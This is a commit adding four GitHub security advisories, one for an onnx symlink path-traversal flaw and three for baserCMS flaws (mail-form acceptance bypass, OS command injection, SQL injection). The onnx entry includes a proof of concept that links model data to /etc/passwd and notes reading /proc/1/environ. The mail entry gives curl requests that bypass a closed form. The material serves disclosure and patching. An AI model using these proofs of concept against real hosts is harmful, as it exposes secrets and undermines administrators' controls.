Publish Advisories

GHSA-3r9x-f23j-gc73
GHSA-8cr7-r8qw-gp3c
GHSA-m9g7-rgfc-jcm7
GHSA-vh89-rjph-2g7p

Author: advisory-database[bot]

advisories/github-reviewed/2026/03/GHSA-3r9x-f23j-gc73/GHSA-3r9x-f23j-gc73.json

@@ -0,0 +1,61 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-3r9x-f23j-gc73",
+  "modified": "2026-03-31T22:34:25Z",
+  "published": "2026-03-31T22:34:25Z",
+  "aliases": [
+    "CVE-2026-27489"
+  ],
+  "summary": "onnx Vulnerable to Path Traversal via Symlink",
+  "details": "### Summary\nA path traversal vulnerability via symlink allows to read arbitrary files outside model or user-provided directory. \n\n### Details\nThe following check for symlink is ineffective and it is possible to point a symlink to an arbitrary location on the file system:\nhttps://github.com/onnx/onnx/blob/336652a4b2ab1e530ae02269efa7038082cef250/onnx/checker.cc#L1024-L1033\n\n`std::filesystem::is_regular_file` performs a `status(p)` call on the provided path, which follows symbolic links to determine the file type, meaning it will return true if the target of a symlink is a regular file. \n\n\n### PoC\n\n\n\n```python\n# Create a demo model with external data\nimport os\nimport numpy as np\nimport onnx\nfrom onnx import helper, TensorProto, numpy_helper\n\ndef create_onnx_model(output_path=\"model.onnx\"):\n    weight_matrix = np.random.randn(1000, 1000).astype(np.float32)\n\n    X = helper.make_tensor_value_info(\"X\", TensorProto.FLOAT, [1, 1000])\n    Y = helper.make_tensor_value_info(\"Y\", TensorProto.FLOAT, [1, 1000])\n    W = numpy_helper.from_array(weight_matrix, name=\"W\")\n\n    matmul_node = helper.make_node(\"MatMul\", inputs=[\"X\", \"W\"], outputs=[\"Y\"], name=\"matmul\")\n\n    graph = helper.make_graph(\n        nodes=[matmul_node],\n        name=\"SimpleModel\",\n        inputs=[X],\n        outputs=[Y],\n        initializer=[W]\n    )\n\n    model = helper.make_model(graph, opset_imports=[helper.make_opsetid(\"\", 11)])\n    onnx.checker.check_model(model)\n\n    data_file = output_path.replace('.onnx', '.data')\n\n    if os.path.exists(output_path):\n        os.remove(output_path)\n    if os.path.exists(data_file):\n        os.remove(data_file)\n\n    onnx.save_model(\n        model,\n        output_path,\n        save_as_external_data=True,\n        all_tensors_to_one_file=True,\n        location=os.path.basename(data_file),\n        size_threshold=1024 * 1024\n    )\n\nif __name__ == \"__main__\":\n    create_onnx_model(\"model.onnx\")\n```\n\n1. Run the above code to generate a sample model with external data.\n2. Remove `model.data`\n3. Run `ln -s /etc/passwd model.data`\n4. Load the model using the following code\n5. Observe check for symlink is bypassed and model is succesfuly loaded\n\n```python\nimport onnx\nfrom onnx.external_data_helper import load_external_data_for_model\n\ndef load_onnx_model_basic(model_path=\"model.onnx\"):\n    model = onnx.load(model_path)\n    return model\n\ndef load_onnx_model_explicit(model_path=\"model.onnx\"):\n    model = onnx.load(model_path, load_external_data=False)\n    load_external_data_for_model(model, \".\")\n    return model\n\nif __name__ == \"__main__\":\n    model = load_onnx_model_basic(\"model.onnx\")\n\n```\n\nA common misuse case for successful exploitation is that an adversary can provide victim with a compressed file, containing `poc.onnx` and `poc.data (symlink)`. Once the victim uncompress and load the model, symlink read the adversary selected arbitrary file.\n\n\n### Impact\n\nRead sensitive and arbitrary files and environment variable (e.g. /proc/1/environ) from the host that loads the model.\n\nNOTE: this issue is not limited to UNIX.\n\n### Sample patch\n\n```c\n#include <fcntl.h>\n#include <sys/stat.h>\n#include <unistd.h>\n#include <errno.h>\n\nint open_external_file_no_symlink(const char *base_dir,\n                                  const char *relative_path) {\n    int dirfd = -1;\n    int fd = -1;\n    struct stat st;\n\n    // Open base directory\n    dirfd = open(base_dir, O_RDONLY | O_DIRECTORY);\n    if (dirfd < 0) {\n        return -1;\n    }\n\n    // Open the target relative to base_dir\n    // O_NOFOLLOW => fail if final path component is a symlink\n    fd = openat(dirfd,\n                relative_path,\n                O_RDONLY | O_NOFOLLOW);\n    close(dirfd);\n\n    if (fd < 0) {\n        // ELOOP is the typical error if a symlink is encountered\n        return -1;\n    }\n\n    // Inspect the *opened file*\n    if (fstat(fd, &st) != 0) {\n        close(fd);\n        return -1;\n    }\n\n    // Enforce \"regular file only\"\n    if (!S_ISREG(st.st_mode)) {\n        close(fd);\n        errno = EINVAL;\n        return -1;\n    }\n\n    // fd is now:\n    // - not a symlink\n    // - not a directory\n    // - not a device / FIFO / socket\n    // - race-safe\n    return fd;\n}\n```\n\n### Resources\n\n* https://cwe.mitre.org/data/definitions/61.html\n* https://discuss.secdim.com/t/input-validation-necessary-but-not-sufficient-it-doesnt-target-the-fundamental-issue/1172\n* https://discuss.secdim.com/t/common-pitfalls-for-patching-path-traversal/3368",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "onnx"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.21.0"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 1.20.0"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/onnx/onnx/security/advisories/GHSA-3r9x-f23j-gc73"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/onnx/onnx"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-23",
+      "CWE-61"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-31T22:34:25Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/03/GHSA-8cr7-r8qw-gp3c/GHSA-8cr7-r8qw-gp3c.json

@@ -0,0 +1,72 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-8cr7-r8qw-gp3c",
+  "modified": "2026-03-31T22:36:18Z",
+  "published": "2026-03-31T22:36:18Z",
+  "aliases": [
+    "CVE-2026-30878"
+  ],
+  "summary": "baserCMS has Mail Form Acceptance Bypass via Public API",
+  "details": "### Summary\nA public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API.\n\n### Details\nIn baserCMS, mail form submissions through the front-end UI are guarded by acceptance checks implemented in `MailFrontService::isAccepting()`, which ensures that the mail form is currently accepting submissions (e.g. within its configured publish/acceptance window).\n\nThese checks are enforced in the UI flow handled by `MailController::index()` and `MailController::confirm()`  \n(e.g. `plugins/bc-mail/src/Controller/MailController.php`).\n\nHowever, the public API endpoint:\n\n`plugins/bc-mail/src/Controller/Api/MailMessagesController.php::add()`\n\ndoes not invoke `MailFrontService::isAccepting()` and does not verify whether the mail form is currently accepting submissions. As a result, the API accepts submissions regardless of the form’s acceptance state.\n\nThe endpoint does not require authentication. A valid CSRF cookie and token pair is sufficient to create a mail message. This allows submissions even when administrators intentionally disable or close the mail form via the admin UI.\n\n### PoC\n1. In the admin UI, configure a mail form so that it is **not accepting submissions** (e.g. outside its acceptance period or explicitly closed).\n2. Obtain a CSRF cookie by accessing the site root:\n```\ncurl -sS -D - -o - -c /tmp/basercms_cookies.txt 'http://localhost/'\n```\n3. Extract the CSRF token from the `csrfToken` cookie and submit a POST request to the public API endpoint:\n```\ncurl -sS -D - -o - -X POST 'http://localhost/baser/api/bc-mail/mail_messages/add/1.json' \n-H 'Content-Type: application/x-www-form-urlencoded' \n-H 'Referer: http://localhost/' \n-H 'X-CSRF-Token: <csrf-token-from-cookie>' \n-b /tmp/basercms_cookies.txt \n--data-urlencode 'name_1=Test' \n--data-urlencode 'name_2=User' \n--data-urlencode 'email_1=test@example.com' \n--data-urlencode 'email_2=test@example.com' \n--data-urlencode 'category[]=資料請求' \n--data-urlencode 'root=検索エンジン' \n--data-urlencode 'message=API bypass test'\n```\n4. The server responds with `200 OK` and creates a mail message, even though the form is configured to reject submissions.\n\n### Impact\nThis is an access control / business logic bypass vulnerability.\n\nAdministrators rely on the mail form acceptance settings to temporarily or permanently stop form intake (e.g. during maintenance, incidents, or spam attacks). This vulnerability allows attackers to bypass those controls via the public API, enabling unauthorized mail submissions, spam, and operational disruption.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "baserproject/basercms"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "5.2.3"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 5.2.2"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30878"
+    },
+    {
+      "type": "WEB",
+      "url": "https://basercms.net/security/JVN_20837860"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/baserproject/basercms"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-285"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-31T22:36:18Z",
+    "nvd_published_at": "2026-03-31T01:16:35Z"
+  }
+}

advisories/github-reviewed/2026/03/GHSA-m9g7-rgfc-jcm7/GHSA-m9g7-rgfc-jcm7.json

@@ -0,0 +1,72 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-m9g7-rgfc-jcm7",
+  "modified": "2026-03-31T22:35:47Z",
+  "published": "2026-03-31T22:35:47Z",
+  "aliases": [
+    "CVE-2026-30877"
+  ],
+  "summary": "baserCMS Update Functionality Vulnerable to OS Command Injection",
+  "details": "### Summary\nThe latest version of baserCMS (basercms-5.2.2) contains an OS command injection vulnerability (CWE-78) in its update functionality.\nDue to this issue, an authenticated user with administrator privileges in baserCMS can execute arbitrary OS commands on the server with the privileges of the user account running baserCMS.\n\n### Details\nPlease refer to the attached materials.\n[OSコマンドインジェクション（baserCMSのアップデート機能）.pdf](https://github.com/user-attachments/files/25468689/OS.baserCMS.pdf)\n\n\n\n### Impact\nAn authenticated user with administrator privileges in baserCMS can execute OS commands on the server with the privileges of the user account running baserCMS.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "baserproject/basercms"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "5.2.3"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 5.2.2"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30877"
+    },
+    {
+      "type": "WEB",
+      "url": "https://basercms.net/security/JVN_20837860"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/baserproject/basercms"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-78"
+    ],
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-31T22:35:47Z",
+    "nvd_published_at": "2026-03-31T01:16:35Z"
+  }
+}

advisories/github-reviewed/2026/03/GHSA-vh89-rjph-2g7p/GHSA-vh89-rjph-2g7p.json

@@ -0,0 +1,72 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-vh89-rjph-2g7p",
+  "modified": "2026-03-31T22:35:08Z",
+  "published": "2026-03-31T22:35:08Z",
+  "aliases": [
+    "CVE-2026-27697"
+  ],
+  "summary": "baserCMS has an SQL injection vulnerability in its blog post functionality",
+  "details": "baserCMS has a SQL injection vulnerability in blog posts.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\n\nMalicious SQL may be executed in blog posts.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_52157568\n\n### Credits\n\nMirai Matsumoto@Future Secure Wave, Inc.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "baserproject/basercms"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "5.2.3"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 5.2.2"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27697"
+    },
+    {
+      "type": "WEB",
+      "url": "https://basercms.net/security/JVN_20837860"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/baserproject/basercms"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-89"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-31T22:35:08Z",
+    "nvd_published_at": "2026-03-31T01:16:35Z"
+  }
+}